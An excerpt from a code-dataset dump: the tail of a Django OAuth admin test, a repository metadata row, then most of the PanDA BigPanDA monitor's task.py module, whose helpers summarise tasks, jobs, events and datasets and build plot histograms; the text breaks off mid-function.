'client_type': Application.CLIENT_PUBLIC,
'enabled': True,
'name': 'Test Application',
'redirect_uris': '',
'user': test_user.pk,
})
application = Application.objects.latest('pk')
self.assertRedirects(
response,
reverse('admin:oauth_application_change', args=(application.pk,)))
|
mit
| 3,752,751,868,900,569,600 | 36.444934 | 79 | 0.588863 | false |
PanDAWMS/panda-bigmon-core
|
core/libs/task.py
|
1
|
58650
|
import logging
import time
import copy
import random
import json
import numpy as np
from datetime import datetime, timedelta
from django.db import connection
from django.db.models import Count, Sum
from core.common.models import JediEvents, JediDatasetContents, JediDatasets, JediTaskparams, JediDatasetLocality, JediTasks
from core.pandajob.models import Jobsactive4, Jobsarchived, Jobswaiting4, Jobsdefined4, Jobsarchived4, Jobsarchived_y2015
from core.libs.exlib import dictfetchall, insert_to_temp_table, drop_duplicates, add_job_category, get_job_walltime, \
job_states_count_by_param, get_tmp_table_name, parse_datetime, get_job_queuetime, convert_bytes
from core.libs.job import parse_jobmetrics
from core.libs.dropalgorithm import drop_job_retries, insert_dropped_jobs_to_tmp_table
from core.pandajob.utils import get_pandajob_models_by_year
import core.constants as const
from core.libs.elasticsearch import create_esatlas_connection
from elasticsearch_dsl import Search
from core.settings.local import defaultDatetimeFormat
_logger = logging.getLogger('bigpandamon')
def is_event_service_task(jeditaskid):
"""
Check if a task is EventService
:param jeditaskid: int
:return: eventservice: bool
"""
eventservice = False
query = {'jeditaskid': jeditaskid}
task = list(JediTasks.objects.filter(**query).values('eventservice'))
if len(task) > 0 and 'eventservice' in task[0] and task[0]['eventservice'] is not None and task[0]['eventservice'] == 1:
eventservice = True
return eventservice
def cleanTaskList(tasks, **kwargs):
add_datasets_info = False
add_datasets_locality = False
sortby = None
if 'add_datasets_info' in kwargs:
add_datasets_info = kwargs['add_datasets_info']
if 'add_datasets_locality' in kwargs:
add_datasets_locality = kwargs['add_datasets_locality']
add_datasets_info = True
if 'sortby' in kwargs:
sortby = kwargs['sortby']
for task in tasks:
if task['transpath']:
task['transpath'] = task['transpath'].split('/')[-1]
if task['statechangetime'] is None:
task['statechangetime'] = task['modificationtime']
if 'eventservice' in task:
if task['eventservice'] == 1:
task['eventservice'] = 'eventservice'
else:
task['eventservice'] = 'ordinary'
if 'reqid' in task and task['reqid'] and task['reqid'] < 100000 and task['reqid'] > 100 \
and task['reqid'] != 300 and 'tasktype' in task and not task['tasktype'].startswith('anal'):
task['deftreqid'] = task['reqid']
if 'corecount' in task and task['corecount'] is None:
task['corecount'] = 1
task['age'] = get_task_age(task)
if 'campaign' in task:
task['campaign_cut'] = ':'.join(task['campaign'].split(':')[1:]) if ':' in task['campaign'] else task['campaign']
# Get status of input processing as indicator of task progress if requested
if add_datasets_info:
N_MAX_IN_QUERY = 100
dvalues = ('jeditaskid', 'nfiles', 'nfilesfinished', 'nfilesfailed')
dsquery = {
'type__in': ['input', 'pseudo_input'],
'masterid__isnull': True,
}
extra = '(1=1)'
taskl = [t['jeditaskid'] for t in tasks if 'jeditaskid' in t]
if len(taskl) <= N_MAX_IN_QUERY:
dsquery['jeditaskid__in'] = taskl
else:
            # Backend dependent
tk = insert_to_temp_table(taskl)
extra = "JEDITASKID in (SELECT ID FROM {} WHERE TRANSACTIONKEY={})".format(get_tmp_table_name(), tk)
dsets = JediDatasets.objects.filter(**dsquery).extra(where=[extra]).values(*dvalues)
dsinfo = {}
if len(dsets) > 0:
for ds in dsets:
taskid = ds['jeditaskid']
if taskid not in dsinfo:
dsinfo[taskid] = []
dsinfo[taskid].append(ds)
if add_datasets_locality:
input_dataset_rse = get_dataset_locality(taskl)
for task in tasks:
if 'totevrem' not in task:
task['totevrem'] = None
dstotals = {
'nfiles': 0,
'nfilesfinished': 0,
'nfilesfailed': 0,
'pctfinished': 0,
'pctfailed': 0,
}
if task['jeditaskid'] in dsinfo:
nfiles = 0
nfinished = 0
nfailed = 0
for ds in dsinfo[task['jeditaskid']]:
if int(ds['nfiles']) > 0:
nfiles += int(ds['nfiles'])
nfinished += int(ds['nfilesfinished'])
nfailed += int(ds['nfilesfailed'])
if nfiles > 0:
dstotals['nfiles'] = nfiles
dstotals['nfilesfinished'] = nfinished
dstotals['nfilesfailed'] = nfailed
dstotals['pctfinished'] = round(100. * nfinished / nfiles, 2)
dstotals['pctfailed'] = round(100. * nfailed / nfiles, 2)
task['dsinfo'] = dstotals
task.update(dstotals)
    if sortby is not None:
        if sortby == 'time-ascending':
            tasks = sorted(tasks, key=lambda x: x['modificationtime'])
        elif sortby == 'time-descending':
            tasks = sorted(tasks, key=lambda x: x['modificationtime'], reverse=True)
        elif sortby == 'statetime-descending':
            tasks = sorted(tasks, key=lambda x: x['statechangetime'], reverse=True)
elif sortby == 'priority':
tasks = sorted(tasks, key=lambda x: x['taskpriority'], reverse=True)
elif sortby == 'nfiles':
tasks = sorted(tasks, key=lambda x: x['dsinfo']['nfiles'], reverse=True)
elif sortby == 'pctfinished':
tasks = sorted(tasks, key=lambda x: x['dsinfo']['pctfinished'], reverse=True)
elif sortby == 'pctfailed':
tasks = sorted(tasks, key=lambda x: x['dsinfo']['pctfailed'], reverse=True)
elif sortby == 'taskname':
tasks = sorted(tasks, key=lambda x: x['taskname'])
elif sortby == 'jeditaskid' or sortby == 'taskid':
tasks = sorted(tasks, key=lambda x: -x['jeditaskid'])
elif sortby == 'cloud':
tasks = sorted(tasks, key=lambda x: x['cloud'], reverse=True)
else:
tasks = sorted(tasks, key=lambda x: -x['jeditaskid'])
return tasks
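# Illustration (an addition, not used in production): replicates the campaign
# trimming in cleanTaskList() above, which strips a leading 'group:' prefix
# from the campaign name if present. The campaign names below are made up.
def _demo_campaign_cut(campaign):
    """
    >>> _demo_campaign_cut('MC16:MC16a')
    'MC16a'
    >>> _demo_campaign_cut('MC16a')
    'MC16a'
    """
    return ':'.join(campaign.split(':')[1:]) if ':' in campaign else campaign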
def job_summary_for_task(query, extra="(1=1)", **kwargs):
"""An attempt to rewrite it moving dropping to db request level"""
start_time = time.time()
mode = 'nodrop'
if 'mode' in kwargs:
mode = kwargs['mode']
task_archive_flag = 1
if 'task_archive_flag' in kwargs and kwargs['task_archive_flag']:
task_archive_flag = kwargs['task_archive_flag']
jobs = []
# getting jobs from DB
jquery = copy.deepcopy(query)
jquery_notime = copy.deepcopy(query)
if 'modificationtime__castdate__range' in jquery_notime:
try:
del jquery_notime['modificationtime__castdate__range']
        except KeyError:
_logger.warning('failed to remove modificationtime range from jquery')
values = ('actualcorecount', 'eventservice', 'modificationtime', 'jobsubstatus', 'pandaid', 'jobstatus',
'jeditaskid', 'processingtype', 'maxpss', 'starttime', 'endtime', 'computingsite', 'jobmetrics',
'nevents', 'hs06', 'hs06sec', 'cpuconsumptiontime', 'cpuconsumptionunit', 'transformation',
'jobsetid', 'specialhandling', 'creationtime')
if task_archive_flag >= 0:
jobs.extend(Jobsdefined4.objects.filter(**jquery_notime).extra(where=[extra]).values(*values))
jobs.extend(Jobswaiting4.objects.filter(**jquery_notime).extra(where=[extra]).values(*values))
jobs.extend(Jobsactive4.objects.filter(**jquery_notime).extra(where=[extra]).values(*values))
jobs.extend(Jobsarchived4.objects.filter(**jquery_notime).extra(where=[extra]).values(*values))
jobs.extend(Jobsarchived.objects.filter(**jquery_notime).extra(where=[extra]).values(*values))
_logger.info("Got jobs from ADCR: {} sec".format(time.time() - start_time))
if task_archive_flag <= 0:
# get list of jobsarchived models
jobsarchived_models = get_pandajob_models_by_year(jquery['modificationtime__castdate__range'])
if len(jobsarchived_models) > 0:
for jam in jobsarchived_models:
jobs.extend(jam.objects.filter(**jquery).extra(where=[extra]).values(*values))
_logger.info("Got jobs from ATLARC: {} sec".format(time.time() - start_time))
_logger.info("Got jobs: {} sec".format(time.time() - start_time))
# drop duplicate jobs
jobs = drop_duplicates(jobs, id='pandaid')
_logger.info("Dropped jobs: {} sec".format(time.time() - start_time))
if mode == 'drop':
jobs, dj, dmj = drop_job_retries(jobs, jquery['jeditaskid'], is_return_dropped_jobs=False)
_logger.info("Dropped job retries (drop mode): {} sec".format(time.time() - start_time))
# determine jobs category (build, run or merge)
jobs = add_job_category(jobs)
_logger.info("Determine job category: {} sec".format(time.time() - start_time))
# parse job metrics and add to job dict
jobs = parse_jobmetrics(jobs)
_logger.info("Parsed and added job metrics: {} sec".format(time.time() - start_time))
# prepare data for job consumption plots
plots_list = job_consumption_plots(jobs)
_logger.info("Prepared job consumption plots: {} sec".format(time.time() - start_time))
# jobs states aggregation by category
job_summary_list = job_states_count_by_param(jobs, param='category')
job_summary_list_ordered = []
job_category_order = ['build', 'run', 'merge']
for jc in job_category_order:
for jcs in job_summary_list:
if jc == jcs['value']:
job_summary_list_ordered.append(jcs)
_logger.info("Got summary by job category: {} sec".format(time.time() - start_time))
# find scouts
scouts = get_task_scouts(jobs)
_logger.info("Got scouts: {} sec".format(time.time() - start_time))
# calculate metrics
metrics = calculate_metrics(jobs, metrics_names=[
'resimevents_avg', 'resimeventspernevents_avgpercent', 'resimevents_sum'])
return plots_list, job_summary_list_ordered, scouts, metrics
def get_task_scouts(jobs):
"""
Get PanDAIDs of selected scouting metrics for a task
:param jobs: list of dicts
:return: dict:
"""
scouts_dict = {}
scout_types = ['cpuTime', 'walltime', 'ramCount', 'ioIntensity', 'outDiskCount']
for jst in scout_types:
scouts_dict[jst] = []
for job in jobs:
for jst in scout_types:
if 'jobmetrics' in job and 'scout=' in job['jobmetrics'] and jst in job['jobmetrics'][job['jobmetrics'].index('scout='):]:
scouts_dict[jst].append(job['pandaid'])
# remove scout type if no scouts
st_to_remove = []
for jst, jstd in scouts_dict.items():
if len(jstd) == 0:
st_to_remove.append(jst)
for st in st_to_remove:
if st in scouts_dict:
del scouts_dict[st]
return scouts_dict
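# Illustration (an addition, not used in production): how the scout lookup in
# get_task_scouts() behaves on a toy job list; the pandaid values and
# jobmetrics strings below are made up.
def _demo_get_task_scouts():
    """
    >>> _demo_get_task_scouts()
    {'cpuTime': [1], 'ramCount': [1]}
    """
    jobs = [
        {'pandaid': 1, 'jobmetrics': 'nEvents=100 scout=cpuTime,ramCount'},
        {'pandaid': 2, 'jobmetrics': 'nEvents=100'},
    ]
    return get_task_scouts(jobs)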
def calculate_metrics(jobs, metrics_names):
"""
Calculate job metrics for a task
:param jobs:
:param metrics_names:
:return:
"""
metrics_def_dict = {mn: {'metric': mn.split('_')[0], 'agg': mn.split('_')[1], 'data': [], 'value': -1} for mn in metrics_names}
for job in jobs:
if job['category'] == 'run' and job['jobstatus'] == 'finished':
for mn, mdata in metrics_def_dict.items():
if 'per' in mdata['metric']:
if mdata['metric'].split('per')[0] in job and mdata['metric'].split('per')[1] in job and job[mdata['metric'].split('per')[1]] > 0:
mdata['data'].append(job[mdata['metric'].split('per')[0]]/(1.0*job[mdata['metric'].split('per')[1]]))
elif mdata['metric'] in job and job[mdata['metric']]:
mdata['data'].append(job[mdata['metric']])
for mn, mdata in metrics_def_dict.items():
if 'avg' in mdata['agg']:
mdata['value'] = sum(mdata['data'])/(1.0*len(mdata['data'])) if len(mdata['data']) > 0 else -1
if 'sum' in mdata['agg']:
mdata['value'] = sum(mdata['data'])
metrics = {}
for mn, mdata in metrics_def_dict.items():
if mdata['value'] > 0:
if 'percent' in mdata['agg']:
metrics[mn] = round(mdata['value'] * 100.0, 2)
else:
metrics[mn] = round(mdata['value'], 2)
return metrics
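# Illustration (an addition, not used in production): the job values below
# are made up; 'resimeventspernevents' divides resimevents by nevents per
# job before averaging, and the 'percent' suffix scales the result by 100.
def _demo_calculate_metrics():
    """
    >>> _demo_calculate_metrics()
    {'resimevents_avg': 150.0, 'resimeventspernevents_avgpercent': 75.0, 'resimevents_sum': 300}
    """
    jobs = [
        {'category': 'run', 'jobstatus': 'finished', 'resimevents': 100, 'nevents': 200},
        {'category': 'run', 'jobstatus': 'finished', 'resimevents': 200, 'nevents': 200},
    ]
    return calculate_metrics(jobs, metrics_names=[
        'resimevents_avg', 'resimeventspernevents_avgpercent', 'resimevents_sum'])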
def job_consumption_plots(jobs):
start_time = time.time()
plots_dict = {}
plot_details = {
'nevents_sum_finished': {
'type': 'pie', 'group_by': 'computingsite',
'title': 'Number of events', 'xlabel': 'N events', 'ylabel': 'N jobs'},
'nevents_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Number of events', 'xlabel': 'N events', 'ylabel': 'N jobs'},
'resimevents_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Resim events (finished jobs)', 'xlabel': 'N resim events', 'ylabel': 'N jobs'},
'maxpss_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Max PSS (finished jobs)', 'xlabel': 'MaxPSS, MB', 'ylabel': 'N jobs'},
'maxpsspercore_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Max PSS/core (finished jobs)', 'xlabel': 'MaxPSS per core, MB', 'ylabel': 'N jobs'},
'walltime_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Walltime (finished jobs)', 'xlabel': 'Walltime, s', 'ylabel': 'N jobs'},
'walltimeperevent_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Walltime/event (finished jobs)', 'xlabel': 'Walltime per event, s', 'ylabel': 'N jobs'},
'queuetime_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Time to start (finished jobs)', 'xlabel': 'Time to start, s', 'ylabel': 'N jobs'},
'hs06s_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'HS06s (finished jobs)', 'xlabel': 'HS06s', 'ylabel': 'N jobs'},
'cputime_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'CPU time (finished jobs)', 'xlabel': 'CPU time, s', 'ylabel': 'N jobs'},
'cputimeperevent_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'CPU time/event (finished jobs)', 'xlabel': 'CPU time, s', 'ylabel': 'N jobs'},
'dbtime_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'DB time (finished jobs)', 'xlabel': 'DB time, s', 'ylabel': 'N jobs'},
'dbdata_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'DB data (finished jobs)', 'xlabel': 'DB data, MB', 'ylabel': 'N jobs'},
'workdirsize_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Workdir size (finished jobs)', 'xlabel': 'Workdir, MB', 'ylabel': 'N jobs'},
'leak_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Memory leak (finished jobs)', 'xlabel': 'Memory leak, B/s', 'ylabel': 'N jobs'},
'nprocesses_finished': {
'type': 'stack_bar', 'group_by': 'computingsite',
            'title': 'N processes (finished jobs)', 'xlabel': 'N processes', 'ylabel': 'N jobs'},
'maxpss_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Maximum PSS (failed jobs)', 'xlabel': 'MaxPSS, MB', 'ylabel': 'N jobs'},
'maxpsspercore_failed': {
'type': 'stack_bar', 'group_by': 'computingsite', 'title': 'Max PSS/core (failed jobs)',
'xlabel': 'MaxPSS per core, MB', 'ylabel': 'N jobs'},
'walltime_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Walltime (failed jobs)', 'xlabel': 'walltime, s', 'ylabel': 'N jobs'},
'queuetime_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Time to start (failed jobs)', 'xlabel': 'Time to start, s', 'ylabel': 'N jobs'},
'walltimeperevent_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Walltime/event (failed jobs)', 'xlabel': 'Walltime per event, s', 'ylabel': 'N jobs'},
'hs06s_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'HS06s (failed jobs)', 'xlabel': 'HS06s', 'ylabel': 'N jobs'},
'cputime_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'CPU time (failed jobs)', 'xlabel': 'CPU time, s', 'ylabel': 'N jobs'},
'cputimeperevent_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'CPU time/event (failed jobs)', 'xlabel': 'CPU time, s', 'ylabel': 'N jobs'},
'dbtime_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'DB time (failed jobs)', 'xlabel': 'DB time, s', 'ylabel': 'N jobs'},
'dbdata_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'DB data (failed jobs)', 'xlabel': 'DB data, MB', 'ylabel': 'N jobs'},
'workdirsize_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Workdir size (failed jobs)', 'xlabel': 'Workdir, MB', 'ylabel': 'N jobs'},
'leak_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
'title': 'Memory leak (failed jobs)', 'xlabel': 'Memory leak, B/s', 'ylabel': 'N jobs'},
'nprocesses_failed': {
'type': 'stack_bar', 'group_by': 'computingsite',
            'title': 'N processes (failed jobs)', 'xlabel': 'N processes', 'ylabel': 'N jobs'},
'walltime_bycpuunit_finished': {
'type': 'stack_bar', 'group_by': 'cpuconsumptionunit',
'title': 'Walltime (finished jobs)', 'xlabel': 'Walltime, s', 'ylabel': 'N jobs'},
'walltime_bycpuunit_failed': {
'type': 'stack_bar', 'group_by': 'cpuconsumptionunit',
'title': 'Walltime (failed jobs)', 'xlabel': 'Walltime, s', 'ylabel': 'N jobs'},
}
plots_data = {}
for pname, pd in plot_details.items():
if pd['type'] not in plots_data:
plots_data[pd['type']] = {}
plots_data[pd['type']][pname] = {
'build': {},
'run': {},
'merge': {}
}
MULTIPLIERS = {
"SEC": 1.0,
"MIN": 60.0,
"HOUR": 60.0 * 60.0,
"MB": 1024.0,
"GB": 1024.0 * 1024.0,
}
# prepare data for plots
for job in jobs:
if job['actualcorecount'] is None:
job['actualcorecount'] = 1
if 'duration' not in job:
job['duration'] = get_job_walltime(job)
if 'queuetime' not in job:
job['queuetime'] = get_job_queuetime(job)
if job['jobstatus'] in ('finished', 'failed'):
            for pname, pd in plot_details.items():
                if pd['group_by'] in job and job[pd['group_by']] not in plots_data[pd['type']][pname][job['category']]:
                    plots_data[pd['type']][pname][job['category']][job[pd['group_by']]] = []
if 'nevents' in job and job['nevents'] > 0 and job['jobstatus'] == 'finished':
plots_data['stack_bar']['nevents' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(job['nevents'])
plots_data['pie']['nevents_sum_finished'][job['category']][job['computingsite']].append(job['nevents'])
if 'maxpss' in job and job['maxpss'] is not None and job['maxpss'] >= 0:
plots_data['stack_bar']['maxpss' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['maxpss'] / MULTIPLIERS['MB']
)
if job['actualcorecount'] and job['actualcorecount'] > 0:
plots_data['stack_bar']['maxpsspercore' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['maxpss'] / MULTIPLIERS['MB'] / job['actualcorecount']
)
if 'hs06sec' in job and job['hs06sec']:
plots_data['stack_bar']['hs06s' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(job['hs06sec'])
if 'queuetime' in job and job['queuetime']:
plots_data['stack_bar']['queuetime' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(job['queuetime'])
if 'duration' in job and job['duration']:
plots_data['stack_bar']['walltime' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(job['duration'])
if 'walltimeperevent' in job:
plots_data['stack_bar']['walltimeperevent' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['walltimeperevent']
)
elif 'nevents' in job and job['nevents'] is not None and job['nevents'] > 0:
plots_data['stack_bar']['walltimeperevent' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['duration'] / (job['nevents'] * 1.0)
)
if 'cpuconsumptionunit' in job and job['cpuconsumptionunit']:
plots_data['stack_bar']['walltime_bycpuunit' + '_' + job['jobstatus']][job['category']][job['cpuconsumptionunit']].append(job['duration'])
if 'cpuconsumptiontime' in job and job['cpuconsumptiontime'] is not None and job['cpuconsumptiontime'] > 0:
plots_data['stack_bar']['cputime' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['cpuconsumptiontime']
)
if 'nevents' in job and job['nevents'] is not None and job['nevents'] > 0:
plots_data['stack_bar']['cputimeperevent' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['cpuconsumptiontime'] / (job['nevents'] * 1.0)
)
if 'leak' in job and job['leak'] is not None:
plots_data['stack_bar']['leak' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['leak']
)
if 'nprocesses' in job and job['nprocesses'] is not None and job['nprocesses'] > 0:
plots_data['stack_bar']['nprocesses' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['nprocesses']
)
if 'workdirsize' in job and job['workdirsize'] is not None and job['workdirsize'] > 0:
plots_data['stack_bar']['workdirsize' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
convert_bytes(job['workdirsize'], output_unit='MB')
)
if 'dbtime' in job and job['dbtime'] is not None and job['dbtime'] > 0:
plots_data['stack_bar']['dbtime' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['dbtime']
)
if 'dbdata' in job and job['dbdata'] is not None and job['dbdata'] > 0:
plots_data['stack_bar']['dbdata' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
convert_bytes(job['dbdata'], output_unit='MB')
)
if 'resimevents' in job and job['resimevents'] and job['jobstatus'] == 'finished':
plots_data['stack_bar']['resimevents' + '_' + job['jobstatus']][job['category']][job['computingsite']].append(
job['resimevents'])
_logger.info("prepare plots data: {} sec".format(time.time() - start_time))
# remove empty categories
cat_to_remove = {'build': True, 'run': True, 'merge': True}
for pt, td in plots_data.items():
for pm, pd in td.items():
for cat, cd in pd.items():
if len(cd) > 0:
cat_to_remove[cat] = False
for pt, td in plots_data.items():
for pm, pd in td.items():
for cat, is_remove in cat_to_remove.items():
if is_remove:
del pd[cat]
# add 'all' category to histograms
for pt, td in plots_data.items():
for pm, pd in td.items():
all_cat = {}
for cat, cd in pd.items():
for site, sd in cd.items():
if site not in all_cat:
all_cat[site] = []
all_cat[site].extend(sd)
pd['all'] = all_cat
# remove empty plots
plots_to_remove = []
for pt, td in plots_data.items():
for pm, pd in td.items():
if sum([len(site_data) for site, site_data in pd['all'].items()]) == 0:
plots_to_remove.append(pm)
for pm in plots_to_remove:
for pt, td in plots_data.items():
if pm in td:
del plots_data[pt][pm]
del plot_details[pm]
_logger.info("clean up plots data: {} sec".format(time.time() - start_time))
# prepare stack histogram data
for pname, pd in plot_details.items():
if pd['type'] == 'stack_bar':
plots_dict[pname] = {
'details': plot_details[pname],
'data': {},
}
for cat, cd in plots_data[pd['type']][pname].items():
n_decimals = 0
if 'per' in pname:
n_decimals = 2
stats, columns = build_stack_histogram(cd, n_decimals=n_decimals)
plots_dict[pname]['data'][cat] = {
'columns': columns,
'stats': stats,
}
elif pd['type'] == 'pie':
plots_dict[pname] = {
'details': plot_details[pname],
'data': {},
}
for cat, cd in plots_data[pd['type']][pname].items():
columns = []
for site in cd:
columns.append([site, sum(cd[site])])
plots_dict[pname]['data'][cat] = {
'columns': sorted(columns, key=lambda x: -x[1]),
}
            max_columns = max([len(i['columns']) for i in plots_dict[pname]['data'].values()])
            if max_columns > 15:
                plots_dict[pname]['details']['legend_position'] = 'bottom'
                plots_dict[pname]['details']['size'] = [800, 300 + 20 * int(max_columns / 6)]
_logger.info("built plots: {} sec".format(time.time() - start_time))
# transform dict to list
plots_list = []
for pname, pdata in plots_dict.items():
plots_list.append({'name': pname, 'data': pdata})
return plots_list
def build_stack_histogram(data_raw, **kwargs):
"""
Prepare stack histogram data and calculate mean and std metrics
:param data_raw: dict of lists
:param kwargs:
:return:
"""
n_decimals = 0
if 'n_decimals' in kwargs:
n_decimals = kwargs['n_decimals']
N_BINS_MAX = 50
stats = []
columns = []
data_all = []
for site, sd in data_raw.items():
data_all.extend(sd)
stats.append(np.average(data_all) if not np.isnan(np.average(data_all)) else 0)
stats.append(np.std(data_all) if not np.isnan(np.std(data_all)) else 0)
bins_all, ranges_all = np.histogram(data_all, bins='auto')
if len(ranges_all) > N_BINS_MAX + 1:
bins_all, ranges_all = np.histogram(data_all, bins=N_BINS_MAX)
ranges_all = list(np.round(ranges_all, n_decimals))
x_axis_ticks = ['x']
x_axis_ticks.extend(ranges_all[:-1])
for stack_param, data in data_raw.items():
column = [stack_param]
column.extend(list(np.histogram(data, ranges_all)[0]))
# do not add if all the values are zeros
if sum(column[1:]) > 0:
columns.append(column)
# sort by biggest impact
columns = sorted(columns, key=lambda x: sum(x[1:]), reverse=True)
columns.insert(0, x_axis_ticks)
return stats, columns
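# Illustration (an addition, not used in production): stats holds [mean, std]
# over all values pooled across sites, and columns is a list of rows whose
# first entry is the 'x' row of bin edges. Site names below are made up.
def _demo_build_stack_histogram():
    """
    >>> stats, columns = _demo_build_stack_histogram()
    >>> [float(round(s, 2)) for s in stats]
    [4.0, 3.56]
    >>> columns[0][0]
    'x'
    """
    return build_stack_histogram({'SITE_A': [1, 2], 'SITE_B': [9]})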
def event_summary_for_task(mode, query, **kwargs):
"""
Event summary for a task.
    In drop mode we need a transaction key (tk_dj) to exclude job retries; if it is not provided, we compute it here.
:param mode: str (drop or nodrop)
:param query: dict
:return: eventslist: list of dict (number of events in different states)
"""
tk_dj = -1
    if 'tk_dj' in kwargs:
tk_dj = kwargs['tk_dj']
if mode == 'drop' and tk_dj == -1:
# inserting dropped jobs to tmp table
extra = '(1=1)'
extra, tk_dj = insert_dropped_jobs_to_tmp_table(query, extra)
eventservicestatelist = [
'ready', 'sent', 'running', 'finished', 'cancelled', 'discarded', 'done', 'failed', 'fatal', 'merged',
'corrupted'
]
eventslist = []
essummary = dict((key, 0) for key in eventservicestatelist)
    _logger.info('getting event states summary')
if mode == 'drop':
jeditaskid = query['jeditaskid']
# explicit time window for better searching over partitioned JOBSARCHIVED
time_field = 'modificationtime'
time_format = "YYYY-MM-DD HH24:MI:SS"
if 'creationdate__range' in query:
extra_str = " AND ( {} > TO_DATE('{}', '{}') AND {} < TO_DATE('{}', '{}') )".format(
time_field, query['creationdate__range'][0], time_format,
time_field, query['creationdate__range'][1], time_format)
else: # if no time range -> look in last 3 months
extra_str = 'AND {} > SYSDATE - 90'.format(time_field)
equerystr = """
SELECT
/*+ cardinality(tmp 10) INDEX_RS_ASC(ev JEDI_EVENTS_PK) NO_INDEX_FFS(ev JEDI_EVENTS_PK) NO_INDEX_SS(ev JEDI_EVENTS_PK) */
SUM(DEF_MAX_EVENTID-DEF_MIN_EVENTID+1) AS EVCOUNT,
ev.STATUS
FROM ATLAS_PANDA.JEDI_EVENTS ev,
(select ja4.pandaid from ATLAS_PANDA.JOBSARCHIVED4 ja4
where ja4.jeditaskid = :tid and ja4.eventservice is not NULL and ja4.eventservice != 2
and ja4.pandaid not in (select id from ATLAS_PANDABIGMON.TMP_IDS1DEBUG where TRANSACTIONKEY = :tkdj)
union
select ja.pandaid from ATLAS_PANDAARCH.JOBSARCHIVED ja
where ja.jeditaskid = :tid and ja.eventservice is not NULL and ja.eventservice != 2 {}
and ja.pandaid not in (select id from ATLAS_PANDABIGMON.TMP_IDS1DEBUG where TRANSACTIONKEY = :tkdj)
union
select jav4.pandaid from ATLAS_PANDA.jobsactive4 jav4
where jav4.jeditaskid = :tid and jav4.eventservice is not NULL and jav4.eventservice != 2
and jav4.pandaid not in (select id from ATLAS_PANDABIGMON.TMP_IDS1DEBUG where TRANSACTIONKEY = :tkdj)
union
select jw4.pandaid from ATLAS_PANDA.jobswaiting4 jw4
where jw4.jeditaskid = :tid and jw4.eventservice is not NULL and jw4.eventservice != 2
and jw4.pandaid not in (select id from ATLAS_PANDABIGMON.TMP_IDS1DEBUG where TRANSACTIONKEY = :tkdj)
union
select jd4.pandaid from ATLAS_PANDA.jobsdefined4 jd4
where jd4.jeditaskid = :tid and jd4.eventservice is not NULL and jd4.eventservice != 2
and jd4.pandaid not in (select id from ATLAS_PANDABIGMON.TMP_IDS1DEBUG where TRANSACTIONKEY = :tkdj)
) j
WHERE ev.PANDAID = j.pandaid AND ev.jeditaskid = :tid
GROUP BY ev.STATUS
""".format(extra_str)
new_cur = connection.cursor()
new_cur.execute(equerystr, {'tid': jeditaskid, 'tkdj': tk_dj})
evtable = dictfetchall(new_cur)
for ev in evtable:
essummary[eventservicestatelist[ev['STATUS']]] += ev['EVCOUNT']
if mode == 'nodrop':
event_counts = []
equery = {'jeditaskid': query['jeditaskid']}
event_counts.extend(
JediEvents.objects.filter(**equery).values('status').annotate(count=Count('status')).order_by('status'))
for state in event_counts:
essummary[eventservicestatelist[state['status']]] = state['count']
    # creating ordered list of the events summary
for state in eventservicestatelist:
eventstatus = {}
eventstatus['statusname'] = state
eventstatus['count'] = essummary[state]
eventslist.append(eventstatus)
return eventslist
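# Illustration (an addition): JEDI persists event states as integer codes, and
# event_summary_for_task() maps a code to its name by index into the
# eventservicestatelist defined above.
def _demo_event_status_codes():
    """
    >>> states = ['ready', 'sent', 'running', 'finished', 'cancelled',
    ...           'discarded', 'done', 'failed', 'fatal', 'merged', 'corrupted']
    >>> states[3], states[9]
    ('finished', 'merged')
    """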
def datasets_for_task(jeditaskid):
"""
Getting list of datasets corresponding to a task and file state summary
:param jeditaskid: int
:return: dsets: list of dicts
:return: dsinfo: dict
"""
dsets = []
dsinfo = {
'nfiles': 0,
'nfilesfinished': 0,
'nfilesfailed': 0,
'pctfinished': 0.0,
'pctfailed': 0,
'neventsTot': 0,
'neventsUsedTot': 0,
'neventsOutput': 0,
}
dsquery = {
'jeditaskid': jeditaskid,
}
values = (
'jeditaskid', 'datasetid', 'datasetname', 'containername', 'type', 'masterid', 'streamname', 'status',
